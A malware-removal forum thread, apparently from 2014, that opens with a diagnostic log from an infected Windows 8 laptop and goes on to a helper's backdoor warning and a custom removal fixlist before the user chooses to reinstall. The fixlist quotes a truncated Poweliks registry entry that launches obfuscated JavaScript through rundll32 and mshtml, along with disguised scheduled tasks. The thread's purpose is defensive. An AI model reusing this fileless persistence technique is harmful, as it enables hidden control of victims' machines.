2014-08-14 16:29 - 2014-08-06 23:20 - 08537928 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\pdf.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 00353096 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ppGoogleNaClPluginChrome.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 01732936 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ffmpegsumo.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 14669128 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "Intel AppUp(SM) center"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "Norton Online Backup"
HKLM\...\StartupApproved\Run32: => "RemoteControl10"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "TrojanScanner"
HKCU\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_7658F97A8AE129BDD15C9751079A5083"
HKCU\...\StartupApproved\Run: => "Dailtyqovoyxivw"
HKCU\...\StartupApproved\Run: => "Skype"
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/23/2014 01:34:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Faulting module name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Exception code: 0x40000015
Fault offset: 0x000000000021dbc1
Faulting process id: 0x1578
Faulting application start time: 0xGuaranaAgent.exe0
Faulting application path: GuaranaAgent.exe1
Faulting module path: GuaranaAgent.exe2
Report Id: GuaranaAgent.exe3
Faulting package full name: GuaranaAgent.exe4
Faulting package-relative application ID: GuaranaAgent.exe5
 
Error: (08/23/2014 01:21:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x0002fb1e
Faulting process id: 0x1542c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 01:12:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x00061206
Faulting process id: 0x2ce4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 00:54:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x00061206
Faulting process id: 0x1e48
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 00:17:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x0004f592
Faulting process id: 0x28c4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 00:09:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Faulting module name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Exception code: 0x40000015
Fault offset: 0x000000000021dbc1
Faulting process id: 0x1054
Faulting application start time: 0xGuaranaAgent.exe0
Faulting application path: GuaranaAgent.exe1
Faulting module path: GuaranaAgent.exe2
Report Id: GuaranaAgent.exe3
Faulting package full name: GuaranaAgent.exe4
Faulting package-relative application ID: GuaranaAgent.exe5
 
Error: (08/23/2014 10:22:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: devmonsrv.exe, version: 2.5.0.244, time stamp: 0x50220e70
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x7d4
Faulting application start time: 0xdevmonsrv.exe0
Faulting application path: devmonsrv.exe1
Faulting module path: devmonsrv.exe2
Report Id: devmonsrv.exe3
Faulting package full name: devmonsrv.exe4
Faulting package-relative application ID: devmonsrv.exe5
 
Error: (08/23/2014 09:51:49 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest1".Error in manifest or policy file "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest2" on line C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest.
Component 2: C:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifest.
 
Error: (08/23/2014 09:47:51 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest1".Error in manifest or policy file "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest2" on line C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest.
Component 2: C:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifest.
 
Error: (08/23/2014 08:34:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x00061206
Faulting process id: 0x1edbc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
 
System errors:
=============
Error: (08/23/2014 01:27:46 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: 0x000000fc (0x0000000000160d40, 0x13c00000b3ce7867, 0xfffff8801c1438e0, 0x0000000080000005)C:\windows\MEMORY.DMP082314-36093-01
 
Error: (08/23/2014 01:27:00 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 12:47:00 PM on ‎8/‎23/‎2014 was unexpected.
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2967916).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2934016).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Security Update for Microsoft .NET Framework 3.5 on Windows 8 and Windows Server 2012 for x64-based Systems (KB2966827).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2891804).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2877213).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Security Update for Microsoft .NET Framework 3.5 on Windows 8 and Windows Server 2012 for x64-based Systems (KB2931357).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Security Update for Windows 8 for x64-based Systems (KB2939576).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2876415).
 
 
Microsoft Office Sessions:
=========================
Error: (08/23/2014 01:34:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: GuaranaAgent.exe2.0.13.0507ad50fGuaranaAgent.exe2.0.13.0507ad50f40000015000000000021dbc1157801cfbef86f4691a8C:\Program Files\Samsung\Support Center\GuaranaAgent.exeC:\Program Files\Samsung\Support Center\GuaranaAgent.exeb12d9793-2aeb-11e4-bee3-c48508e01671
 
Error: (08/23/2014 01:21:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c00000050002fb1e1542c01cfbef579d3af66C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dlle28504c9-2ae9-11e4-bee2-c48508e01671
 
Error: (08/23/2014 01:12:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c0000005000612062ce401cfbef502296209C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dll996b3a7d-2ae8-11e4-bee2-c48508e01671
 
Error: (08/23/2014 00:54:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c0000005000612061e4801cfbef289dc33d8C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dll1d0475ab-2ae6-11e4-bee2-c48508e01671
 
Error: (08/23/2014 00:17:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c00000050004f59228c401cfbeed101c3029C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dllfd3721b6-2ae0-11e4-bee2-c48508e01671
 
Error: (08/23/2014 00:09:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: GuaranaAgent.exe2.0.13.0507ad50fGuaranaAgent.exe2.0.13.0507ad50f40000015000000000021dbc1105401cfbeec932d6a34C:\Program Files\Samsung\Support Center\GuaranaAgent.exeC:\Program Files\Samsung\Support Center\GuaranaAgent.exed6046f54-2adf-11e4-bee2-c48508e01671
 
Error: (08/23/2014 10:22:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: devmonsrv.exe2.5.0.24450220e70unknown0.0.0.000000000c0000005000000007d401cfbe27fad27d77C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exeunknowne9622e44-2ad0-11e4-bedd-c48508e01671
 
Error: (08/23/2014 09:51:49 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifestC:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifestC:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe
 
Error: (08/23/2014 09:47:51 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifestC:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifestC:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe
 
Error: (08/23/2014 08:34:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c0000005000612061edbc01cfbece29dddb84C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dllc2821544-2ac1-11e4-bedd-c48508e01671
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-3317U CPU @ 1.70GHz
Percentage of memory in use: 60%
Total physical RAM: 3797.53 MB
Available physical RAM: 1507.45 MB
Total Pagefile: 10965.53 MB
Available Pagefile: 8616.27 MB
Total Virtual: 8192 MB
Available Virtual: 8191.77 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:441.27 GB) (Free:268.96 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 5EFD3DFE)
 
Partition: GPT Partition Type.
 
========================================================
Disk: 1 (Size: 22.4 GB) (Disk ID: 1786C683)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#4 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:07:13 PM

Posted 24 August 2014 - 06:52 AM

Hi prefect,
 
I must give you this warning:
 
Looking through your logs, one or more of your infections has been identified as a Backdoor Trojan. These threats have backdoor functionality which allows hackers to remotely control your computer, steal critical system information, and download and execute files.
 
I highly suggest you to disconnect this PC from the Internet immediately, and if possible use a clean computer and a flash drive to transfer the programs I request for you to run. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. It would be wise to contact those same financial institutions to notify them of your situation.
 
Due to the nature of this trojan, your computer is very likely to be compromised. There is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:
 
How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 
We can still clean this machine, but I can't guarantee that it will be 100% secure afterwards. If you decide to continue cleaning this machine, follow on with the rest of the steps posted below. If you do not want to clean this machine, please let me know.
 
--------------

Going over your logs I noticed that you have µTorrent installed.

  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.

It is pretty much certain that if you continue to use P2P programs, you will get infected again.
I would recommend that you uninstall µTorrent, however that choice is up to you. If you choose to remove these programs, you can do so via Start > Control Panel > Add/Remove Programs.
 
If you wish to keep it, please do not use it until your computer is cleaned.

--------------

I see a number of lines in your log which are related to cracks, torrents and keygens. I shall provide this warning:
 
The practice of using keygenshacking toolscracking toolswareztorrents or any pirated software is not only considered illegal activity, but it is a serious security risk which can turn a computer into a virus honeypot or zombie.
 
When you use these kind of programs, be forewarned that some of the worst types of malware infections can be contracted and spread by visiting crack, keygen, warez and other pirated software sites. In many cases, those sites are infested with a smörgåsbord of malware and an increasing source of system infection. Those who attempt to get software for free can end up with a computer system so badly damaged that recovery is not possible, and it cannot be repaired. When that happens there is nothing you can do besides reformatting and reinstalling the OS.
 
If you want to read on then the full post is here.

--------------

We need to run a fix with FRST:

  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter.
  • Copy and paste the script below in the notepad document:​
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [Dailtyqovoyxivw] => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\Users\Stephen\AppData\Roaming\Niuzdoky
2014-08-21 11:48 - 2014-08-23 13:00 - 00000840 _____ () C:\windows\Tasks\Security Center Update - 436866125.job
2014-08-21 11:48 - 2014-08-21 11:48 - 00003816 _____ () C:\windows\System32\Tasks\Security Center Update - 436866125
2014-08-20 16:22 - 2014-08-23 13:00 - 00000842 _____ () C:\windows\Tasks\Security Center Update - 406261607.job
2014-08-20 16:22 - 2014-08-20 16:22 - 00003818 _____ () C:\windows\System32\Tasks\Security Center Update - 406261607
C:\ProgramData\MakeMarkerFile.exe
C:\Users\EasySurvey\EasySurvey.exe
C:\Users\Stephen\AppData\Roaming\Okodxice
  • Save the file to your desktop and name it as fixlist.txt

Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.
  • Please copy and paste the log in your next reply.

--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • Fixlog.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#5 prefect

prefect
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:13 PM

Posted 24 August 2014 - 10:03 AM

Toffee,

 

Thanks for your warnings and suggestions. If the machine may be compromised beyond saving, then it would be best to just reformat and reinstall the OS as you say. I'd rather just do that and be certain rather than try and clean it and never.



#6 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:07:13 PM

Posted 24 August 2014 - 10:13 AM

Hi prefect,

 

That is fine, and sometimes security of mind is better than worrying about the machine being possibly compromised. Let me know if you need any help with reformatting and reinstalling, otherwise I will close the topic in three days.

 

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#7 prefect

prefect
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:13 PM

Posted 24 August 2014 - 10:48 AM

Toffee,

Thank you . Any assigance you might be able to provide with the reformating would be helpful. I have no idea where to start, and this computer has no disc drive. I'm presently backing up files.

Thanks.

#8 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:07:13 PM

Posted 24 August 2014 - 01:58 PM

Hi prefect,

 

Backing up files is a good start. What make is your computer; hp, dell, samsung, packard bell, acer, lenovo e.c.t.? Also, do you know the make of your computer?

 

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#9 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:07:13 PM

Posted 28 August 2014 - 01:23 PM

Hi prefect,
 
This is a 3 day bump:
 
It has been more than 3 days since my last post.

  • Do you still need help with this?
  • If after 48hrs you have not replied to this thread then it will have to be closed.

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#10 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:07:13 PM

Posted 02 September 2014 - 10:33 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users